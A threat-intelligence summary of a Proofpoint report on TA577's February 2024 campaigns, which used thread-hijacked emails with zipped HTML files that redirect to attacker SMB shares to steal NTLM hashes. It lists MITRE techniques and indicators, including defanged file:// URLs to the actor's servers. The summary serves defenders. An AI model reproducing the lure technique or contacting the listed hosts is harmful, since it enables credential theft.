Threat Research

TA577’s Unusual Attack Chain Leads to NTLM Data Theft  | Proofpoint US

Securonix

Two sentences: Proofpoint details TA577’s use of a novel attack chain to steal NTLM authentication data (NTLM hashes) for information gathering and potential lateral movement, demonstrated through two February 2024 campaigns. The campaigns relied on thread hijacking with zipped HTML attachments to trigger contact with external SMB resources. #TA577 #Pikabot

Keypoints

  • TA577 employed a new attack chain with the objective of stealing NTLM authentication information (NTLM hashes).
  • Two campaigns on 26–27 February 2024 targeted tens of thousands of messages across many organizations via thread hijacking with zipped HTML attachments.
  • The HTML in the ZIPs triggers a system connection to an SMB server (external resource owned by the threat actor) via a file:// URI.
  • Evidence includes artifacts suggesting use of the Impacket toolkit and a default NTLM server challenge, indicating a specific toolchain and configuration.
  • Stolen NTLM hashes could enable password cracking or Pass-The-Hash attacks to move laterally within compromised networks.
  • TA577 is an initial access broker linked to follow-on ransomware (e.g., Black Basta) and is associated with Pikabot as a payload; defenders are urged to block outbound SMB.

MITRE Techniques

  • [T1566.001] Phishing: Attachment – Thread hijacking with zipped HTML attachments used to lure recipients. “Messages appeared as replies to previous emails, known as thread hijacking, and contained zipped HTML attachments.” (translated quote in English)
  • [T1021.002] SMB/Windows Admin Shares – HTML file triggered a system connection attempt to an SMB server via a meta refresh to a file scheme URI ending in .txt; the file automatically contacts an external SMB resource owned by the threat actor. “When opened, the HTML file triggered a system connection attempt to a Server Message Block (SMB) server via a meta refresh to a file scheme URI ending in .txt. That is, the file would automatically contact an external SMB resource owned by the threat actor.” (translated quote in English)
  • [T1550.002] Pass the Hash – Hashes could be exploited for password cracking or facilitate Pass-The-Hash attacks to move laterally. “These hashes could be exploited for password cracking or facilitate ‘Pass-The-Hash’ attacks using other vulnerabilities within the targeted organization to move laterally within an impacted environment.” (translated quote in English)

Indicators of Compromise

  • [IP] External server access targets – 89.117.1.161, 89.117.2.33
  • [URL] File Scheme Redirect Targets – file://89[.]117[.]1[.]161/mtdi/ZQCw[.]txt, file://89[.]117[.]2[.]33/hvwsuw/udrh[.]txt
  • [File] ZIP attachment hashes – ZIP file hashes (unique per ZIP); 2 more hashes

Read more: https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft